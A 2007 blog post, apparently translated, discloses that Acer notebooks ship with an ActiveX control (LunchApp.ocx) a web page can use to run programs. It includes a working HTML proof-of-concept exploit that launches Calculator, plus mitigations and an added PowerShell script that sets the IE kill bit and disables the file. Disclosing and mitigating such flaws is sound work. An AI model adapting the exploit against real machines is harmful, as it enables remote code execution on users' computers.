January 11, 2007
Acer notebooks ship with a free backdoor from the factory @@

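Friends with an Acer notebook, lucky you~ The factory throws in a backdoor for free.
Check your hard drive: if C:\windows\system\LunchApp.ocx is there, congratulations..
PoC: save the content below as a .htm file and open it in IE (ActiveX must be enabled). If Calculator starts, congratulations again...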
<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha">
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
</script>
</body>
</html>
Fixes:
1. Delete or rename C:\windows\system\LunchApp.ocx
2. If you still trust the vendor's patch: ftp://ftp.support.acer-euro.com/utilities/LaunchAppFix/AcerLAppFix.zip
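An added example, not part of the original post: a PowerShell check for the control, which with `-Fix` applies fix 1 (rename) and also sets the Internet Explorer kill bit for the CLSID used in the PoC. The kill bit (the `Compatibility Flags` value `0x400` under `ActiveX Compatibility`) is IE's standard mechanism and is not mentioned in the post; the `-Fix` switch, the helper name and the `.disabled` suffix are choices of this example.

```powershell
# Added example: audit and mitigate the LunchApp.ocx control from this post.
# Run elevated. -Fix is this script's own switch; without it nothing is changed.
param([switch]$Fix)

$clsid   = '{D9998BD0-7957-11D2-8FED-00606730D3AA}'  # classid used in the PoC
$ocxPath = 'C:\windows\system\LunchApp.ocx'          # path given in the post
$killBit = 0x400                                     # IE kill-bit flag

# Kill-bit keys: native registry view, plus the 32-bit view on 64-bit Windows.
$roots = @('HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility')
if (Test-Path 'HKLM:\SOFTWARE\Wow6432Node') {
    $roots += 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
}

function Get-CompatFlags([string]$Key) {
    # Returns the current "Compatibility Flags" DWORD, or 0 if key/value is absent.
    $p = Get-ItemProperty -Path $Key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $p) { return 0 }
    return $p.'Compatibility Flags'
}

if ($Fix) {
    foreach ($root in $roots) {
        $key = Join-Path $root $clsid
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        $new = (Get-CompatFlags $key) -bor $killBit   # keep any flags already set
        Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $new -Type DWord
    }
    # Fix 1 from the post: rename the control so it can no longer be loaded.
    if (Test-Path $ocxPath) {
        Rename-Item -Path $ocxPath -NewName 'LunchApp.ocx.disabled'
    }
}

# Report the state after any changes.
[pscustomobject]@{
    FilePresent   = Test-Path $ocxPath
    ComRegistered = Test-Path "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid"
    KillBitSet    = @($roots | Where-Object {
                        ((Get-CompatFlags (Join-Path $_ $clsid)) -band $killBit) -eq 0
                    }).Count -eq 0
}
```

`KillBitSet` is true only when every applicable registry view has the flag, so a 64-bit machine with only one view patched still reports false.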
Further reading:
About Acer Notebook LunchApp.APlunch ActiveX Control....
Oh my.. someone had already published this on 2006.11.19..
Dangerous backdoor in Acer laptops [Update]
Acer 'preloads vulns' onto notebooks


